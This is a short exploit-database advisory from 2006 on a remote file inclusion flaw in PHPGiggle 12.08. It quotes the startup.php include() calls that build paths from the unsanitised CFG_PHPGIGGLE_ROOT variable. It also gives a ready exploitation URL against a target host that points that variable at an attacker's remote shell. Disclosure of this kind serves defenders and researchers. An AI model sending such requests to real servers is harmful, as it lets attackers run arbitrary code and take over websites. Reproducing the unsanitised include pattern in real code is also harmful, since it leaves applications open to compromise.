id: 1131
date: 11/06/2006
title: PHPGiggle 12.08 (CFG_PHPGIGGLE_ROOT) File Include Vulnerability
author: ajann
cves: 

===============================================================
PHPGiggle 12.08 (CFG_PHPGIGGLE_ROOT) File Include Vulnerability
===============================================================




*******************************************************************************
# Title  :  Php Giggle  <= 12.08 Remote File Include Vulnerability

# Author :   ajann

# Vuln;

*******************************************************************************
[File]
startup.php
[/File]

[Code,1]
startup.php Error:

..
....
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/system/modregistry.inc.php");
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/public/msg.func.php");
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/public/fileio.func.php");

       //once the file I/O wrapper is brought up, it is convenient to use
       //function fileInclude
....
..

Key [:] CFG_PHPGIGGLE_ROOT=[file]

\Example:

http://target.com/path/modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=[Shell]

# ajann,Turkey
# ...
# Im not Hacker!

http://www.comscripts.com/scripts/php.phpgiggle.565.html =>      T3l0charger



#  0day.today [2023-03-23]  #